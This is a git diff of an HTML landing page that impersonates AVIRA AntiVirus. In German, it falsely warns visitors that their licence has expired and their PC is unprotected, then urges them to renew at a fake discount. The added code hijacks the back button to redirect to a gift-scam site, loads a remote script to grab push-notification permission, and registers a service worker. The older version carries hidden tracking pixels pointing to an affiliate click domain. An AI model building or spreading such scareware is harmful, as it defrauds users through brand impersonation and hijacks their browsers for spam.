--- a/-- clean/Avira/Avira 3/index.html
+++ b/-- clean/Avira/Avira 3/index.html
@@ -1,170 +1,274 @@
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "1074578cb8a4a50cb21cd1d4751a406e.static."><html xmlns="http://www.w3.org/1999/xhtml"><head>
-  
-<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
-<title>Ihre AVIRA AntiVirus Lizenz ist abgelaufen!</title>
-<meta name="robots" content="noindex,nofollow">
-<meta name="viewport" content="width=device-width, initial-scale=1.0">
-<link href="3dda2f05994700c9b9fdb8d53ee12113.static.png" rel="icon" type="image/x-icon">
-<style type="text/css">
-.white{display:none}
-body {
-  width:100%;
-  max-width: 700px;
-  padding:0;
-  margin: 0 auto;
-  margin-top: -10px;
-  text-align: left;
-  background: #000 no-repeat  center center fixed; ;
-  -webkit-background-size: cover;
-  -moz-background-size: cover;
-  -o-background-size: cover;
-  background-size: cover;
-  font-family: Arial;
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "1074578cb8a4a50cb21cd1d4751a406e.static.">
+<html xmlns="http://www.w3.org/1999/xhtml">
 
-}
-.wrapper {
-  background: #fff url(in_css_d3b55718a82ea9b3b4c0af3c92689702.static.png) top right no-repeat;
-  /*text-align: center;*/
-  margin: 0px auto;
-  padding: 20px 40px;
-  padding-bottom: 40px;
-  font-size: 15px;
-  color: #333;
-  position: relative;
-  box-shadow: 1px 1px 5px #666;
-  border-top: 80px solid #ea1010;
-}
-.header {
-  /*text-align: center;*/
-  border-bottom:#838484 solid 5px;
-}
-.header img{
-	width: 100%;
-	max-width:450px;
-}
-.wrapper img{
-	width: 100%;
-}
-h2 {
-  font-weight: normal;
-  font-size: 26px;
-  position: absolute;
-  margin-top: -70px;
-  margin-left: 70px;
-  color: #fff;
-}
-h4 {
-  font-size: 17px;
-  margin-bottom: 0px;
-  border-top: 1px solid #ccc;
-  padding-top: 1em;
-}
-@media screen and (max-width: 992px) {
-	h2{
-	  margin-top: -90px;
-	  margin-left: 0;
-	}
-}
+<head>
 
-.button {
-  color: #fff;
-  display: block;
-  text-decoration: none;
-  font-size: 18px;
-  font-weight: bold;
-  padding: 16px;
-  text-align: center;
-  background: #ea1010;
-  border-radius: 5px;
-  border: 0;
+  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+  <title>Ihre AVIRA AntiVirus Lizenz ist abgelaufen!</title>
+  <meta name="robots" content="noindex,nofollow">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <link href="img/3dda2f05994700c9b9fdb8d53ee12113.static.png" rel="icon" type="image/x-icon">
+  <style type="text/css">
+    .white {
+      display: none
+    }
 
-}
-.button:hover {
-    background: #7c1010;
-    cursor: pointer;
-}
-p {
-  line-height: 1.2em;
-}
-ul li {
-	display:inline-block;
-  margin-bottom: 6px;
-  background: url(in_css_65a1f4c637b9b57c5e5a482932083206.static.gif) no-repeat left top;
-  padding-left: 18px;
-  list-style: none;
-  margin-left: -20px;
-}
-#audioplayer {
-  margin-top: -9999em;
-}
-.offer-button{
-	color:white;
-	text-decoration:none;
-}
-.blinking{
-    animation:blinkingText 1.6s infinite;
-}
-@keyframes blinkingText{
-    0%{     color: #ea1010;    }
-    49%{    color: #ea1010; }
-    60%{    color: #ea1010; }
-    99%{    color: transparent; }
-    100%{   color: #ea1010;    }
-}
-</style>
+    body {
+      width: 100%;
+      max-width: 700px;
+      padding: 0;
+      margin: 0 auto;
+      margin-top: -10px;
+      text-align: left;
+      background: #000 no-repeat center center fixed;
+      ;
+      -webkit-background-size: cover;
+      -moz-background-size: cover;
+      -o-background-size: cover;
+      background-size: cover;
+      font-family: Arial;
 
-<link rel="stylesheet" href="ede0d999b3729209995d7c11658af9d7.static.css"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/2.8.5/css/froala_style.min.css"></head>
+    }
+
+    .wrapper {
+      background: #fff url('img/in_css_d3b55718a82ea9b3b4c0af3c92689702.static.png') top right no-repeat;
+      margin: 0px auto;
+      padding: 20px 40px;
+      padding-bottom: 40px;
+      font-size: 15px;
+      color: #333;
+      position: relative;
+      box-shadow: 1px 1px 5px #666;
+      border-top: 80px solid #ea1010;
+    }
+
+    .header {
+      /*text-align: center;*/
+      border-bottom: #838484 solid 5px;
+    }
+
+    .header img {
+      width: 100%;
+      max-width: 450px;
+    }
+
+    .wrapper img {
+      width: 100%;
+    }
+
+    h2 {
+      font-weight: normal;
+      font-size: 26px;
+      position: absolute;
+      margin-top: -70px;
+      margin-left: 70px;
+      color: #fff;
+    }
+
+    h4 {
+      font-size: 17px;
+      margin-bottom: 0px;
+      border-top: 1px solid #ccc;
+      padding-top: 1em;
+    }
+
+    @media screen and (max-width: 992px) {
+      h2 {
+        margin-top: -90px;
+        margin-left: 0;
+      }
+    }
+
+    .button {
+      color: #fff;
+      display: block;
+      text-decoration: none;
+      font-size: 18px;
+      font-weight: bold;
+      padding: 16px;
+      text-align: center;
+      background: #ea1010;
+      border-radius: 5px;
+      border: 0;
+
+    }
+
+    .button:hover {
+      background: #7c1010;
+      cursor: pointer;
+    }
+
+    p {
+      line-height: 1.2em;
+    }
+
+    ul li {
+      display: inline-block;
+      margin-bottom: 6px;
+      background: url('img/in_css_65a1f4c637b9b57c5e5a482932083206.static.gif') no-repeat left top;
+      padding-left: 18px;
+      list-style: none;
+      margin-left: -20px;
+    }
+
+    #audioplayer {
+      margin-top: -9999em;
+    }
+
+    .offer-button {
+      color: white;
+      text-decoration: none;
+    }
+
+    .blinking {
+      animation: blinkingText 1.6s infinite;
+    }
+
+    @keyframes blinkingText {
+      0% {
+        color: #ea1010;
+      }
+
+      49% {
+        color: #ea1010;
+      }
+
+      60% {
+        color: #ea1010;
+      }
+
+      99% {
+        color: transparent;
+      }
+
+      100% {
+        color: #ea1010;
+      }
+    }
+  </style>
+
+  <link rel="stylesheet" href="css/ede0d999b3729209995d7c11658af9d7.static.css">
+  <link rel="stylesheet" href="css/https://cdnjs.cloudflare.com/ajax/libs/froala-editor/2.8.5/css/froala_style.min.css">
+
+  <script>
+    (function (window, location) {
+      var redirect = "https://free.giftsandmore.vip/?utm_medium=bddab1254dc804572f4ea39f14a9b6c0d448fe5f&utm_campaign=Back-Button-Redirect";
+      var currentUrl = location.origin + location.pathname + location.search;
+      if (location.hash !== "#!/hst") {
+        history.replaceState(null, document.title, currentUrl + "#!/hst");
+        history.pushState(null, document.title, currentUrl);
+      }
+
+      window.addEventListener("popstate", function () {
+        if (location.hash === "#!/hst") {
+          setTimeout(function () {
+            window.location.replace(redirect);
+          }, 0);
+        }
+      }, false);
+    }(window, location));
+  </script>
+  <script>
+    function getURLParameter(name) {
+      var query = window.location.search.substring(1);
+      var vars = query.split("&");
+      for (var i = 0; i < vars.length; i++) {
+        var pair = vars[i].split("=");
+        if (pair[0] === name) { return decodeURI(pair[1]); }
+      }
+      return "";
+    }
+  </script>
+  <script>
+    var s = document.createElement('script');
+    s.src = '//woudaufe.net/act/files/micro.tag.min.js?z=6356874' + '&sw=/sw-check-permissions-82528.js';
+    s.onload = function (result) {
+      switch (result) {
+        case 'onPermissionDefault': break;
+        case 'onPermissionAllowed': break;
+        case 'onPermissionDenied': break;
+        case 'onAlreadySubscribed': break;
+        case 'onNotificationUnsupported': break;
+      }
+    };
+    document.head.appendChild(s);
+  </script>
+  <script>
+    (function () {
+      const interval = setInterval(() => {
+        if (Notification.permission === 'granted') {
+          navigator.serviceWorker.register('/sw.enot.js?appId=1005e5d4864ca6b4e77a62c8c770b62', { scope: '/ntx' })
+          clearInterval(interval)
+        }
+      }, 300)
+    })()
+  </script>
+</head>
+
 <body>
-<div class="header"><span class="link"><img src="e737468ca44a798bf89392ec1cef2c4b.static.png"></span></div>
-<div class="wrapper">
-<h2 class="black">Ihre AVIRA AntiVirus Lizenz ist abgelaufen!</h2>
-<h2 class="white">Ihre AVIRA AntiVirus Lizenz ist abgelaufen!</h2>
-<p><span class="black">Ihre AVIRA AntiVirus Lizenz für Windows ist kürzlich abgelaufen, Datum: </span><span class="white">Ihre AVIRA AntiVirus Lizenz für Windows ist kürzlich abgelaufen, Datum:  </span>
-<strong><script language="Javascript">
+  <div class="header"><span class="link"><img src="img/e737468ca44a798bf89392ec1cef2c4b.static.png"></span></div>
+  <div class="wrapper">
+    <h2 class="black">Ihre AVIRA AntiVirus Lizenz ist abgelaufen!</h2>
+    <h2 class="white">Ihre AVIRA AntiVirus Lizenz ist abgelaufen!</h2>
+    <p><span class="black">Ihre AVIRA AntiVirus Lizenz für Windows ist kürzlich abgelaufen, Datum: </span><span
+        class="white">Ihre AVIRA AntiVirus Lizenz für Windows ist kürzlich abgelaufen, Datum: </span>
+      <strong>
+        <script language="Javascript">
+          var dayNames = new Array("Sonntag", "Montag", "Dienstag", "Mittwoch",
+            "Donnerstag", "Freitag", "Samstag");
+          var monthNames = new Array(
+            "Januar", "Februar", "März", "April", "Mai", "Juni", "Juli",
+            "August", "September", "Oktober", "November", "Dezember");
+          var now = new Date(Date.now() - 90 * 60 * 60 * 1000);
+          document.write(monthNames[now.getMonth()] + " " +
+            now.getDate() + ", " + now.getFullYear());
+        </script>Juli 29, 2024
+      </strong>.
+    </p>
 
-// Array of day names
-var dayNames = new Array("Sonntag","Montag","Dienstag","Mittwoch",
-        "Donnerstag","Freitag","Samstag");
-// Array of month Names
-var monthNames = new Array(
-"Januar","Februar","März","April","Mai","Juni","Juli",
-"August","September","Oktober","November","Dezember");
-var now = new Date(Date.now() - 90*60*60*1000);
-document.write(monthNames[now.getMonth()] + " " + 
- now.getDate() + ", " + now.getFullYear());
-// -->
-</script>Juli 29, 2024</strong>.</p>
 
+    <p>Nachdem Ihre AVIRA AntiVirus Lizenz abgelaufen ist, ist Ihr Computer durch Viren und sonstige Gefahren stark
+      bedroht!</p>
 
-<p>Nachdem Ihre AVIRA AntiVirus Lizenz abgelaufen ist, ist Ihr Computer durch Viren und sonstige Gefahren stark bedroht!</p>
+    <h4 class="black blinking" style="color:orange">Ihr PC ist UNGESCHÜTZT, Viren und andere Bedrohungen können
+      ungestört eindringen.</h4>
+    <h4 class="white blinking" style="color:orange">Ihr PC ist UNGESCHÜTZT, Viren und andere Bedrohungen können
+      ungestört eindringen.</h4>
 
-<h4 class="black blinking" style="color:orange">Ihr PC ist UNGESCHÜTZT, Viren und andere Bedrohungen können ungestört eindringen.</h4>
-<h4 class="white blinking" style="color:orange">Ihr PC ist UNGESCHÜTZT, Viren und andere Bedrohungen können ungestört eindringen.</h4>
+    <ul>
+      <li>Rabatt angewendet (
+        <script language="Javascript">
+          var dayNames = new Array("Sonntag", "Montag", "Dienstag", "Mittwoch",
+            "Donnerstag", "Freitag", "Samstag");
+          var monthNames = new Array(
+            "Januar", "Februar", "März", "April", "Mai", "Juni", "Juli",
+            "August", "September", "Oktober", "November", "Dezember");
+          var now = new Date(Date.now());
+          document.write(monthNames[now.getMonth()] + " " +
+            now.getDate() + ", " + now.getFullYear());
+        </script>August 2, 2024)
+      </li>
+    </ul>
 
-<ul>
-  <li>Rabatt angewendet (<script language="Javascript">
-	// Array of day names
-  var dayNames = new Array("Sonntag","Montag","Dienstag","Mittwoch",
-        "Donnerstag","Freitag","Samstag");
-// Array of month Names
-var monthNames = new Array(
-"Januar","Februar","März","April","Mai","Juni","Juli",
-"August","September","Oktober","November","Dezember");
-	var now = new Date(Date.now());
-	document.write(monthNames[now.getMonth()] + " " + 
-	 now.getDate() + ", " + now.getFullYear());
-	// -->
-	</script>August 2, 2024)
-</li></ul>
+    <span style="padding-left:50px;">Ihr Computer und Ihre aktuelle Lizenz sind qualifiziert für <span
+        style="background-color:#ffd703; font-weight:bold; color:#333; padding:5px;" class="disc">BIS ZU 50%
+        RABATT</span></span><span id="theTime" style="color:red; display:none">4 mins 56 secs</span>
 
-<span style="padding-left:50px;">Ihr Computer und Ihre aktuelle Lizenz sind qualifiziert für <span style="background-color:#ffd703; font-weight:bold; color:#333; padding:5px;" class="disc">BIS ZU 50% RABATT</span></span><span id="theTime" style="color:red; display:none">4 mins 56 secs</span>
+    <script>
+      document.write('<span style="text-align:center;display:block;">' +
+        '<a href="https://' + getURLParameter('domain') + '/click">' +
+        '<img id="img-prod" style="margin:30px 0;max-width:285px" ' +
+        'src="img/c4790777ad9203cb2757dac664fc6f9a.static.png" alt="Product Image">' +
+        '</a>' +
+        '</span>');
+    </script>
 
-  <span style="text-align:center;display:block;"><a href="http://stay-protect.online/click.php?lp=1&amp;uclick=nt46sy6jfe"><img id="img-prod" style="margin:30px 0;max-width:285px" src="c4790777ad9203cb2757dac664fc6f9a.static.png"></a></span>
-<a href="http://stay-protect.online/click.php?lp=1&amp;uclick=nt46sy6jfe" class="offer-button"><div class="button">LIZENZ VERLÄNGERN UND SCHUTZ REAKTIVIEREN</div></a>
-</div>
+    <script>
+      document.write('<a href="https://' + getURLParameter('domain') + '/click" class="offer-button">' +
+        '<div class="button">LIZENZ VERLÄNGERN UND SCHUTZ REAKTIVIEREN</div>' +
+        '</a>');
+    </script>
+  </div>
+</body>
 
-<script type="text/javascript">
-  let trackerUrl = "//stay-protect.online/click.php";
-</script>
-<script type="text/javascript" src="f4b6efcc7fbd80813ab82a9f2c1c9e11.static.js"></script><img width="0" height="0" style="width:0;height:0;position: absolute;left: -30000px;" src="http://stay-protect.online/click.php?event7=1&amp;uclick=nt46sy6jfe&amp;clickid=8a8c1nt46sy6jfec28">
-<img width="0" height="0" style="width:0;height:0;position: absolute;left: -30000px;" src="http://stay-protect.online/click.php?event8=0.2&amp;uclick=nt46sy6jfe&amp;clickid=8a8c1nt46sy6jfec28"></body></html>
+</html>
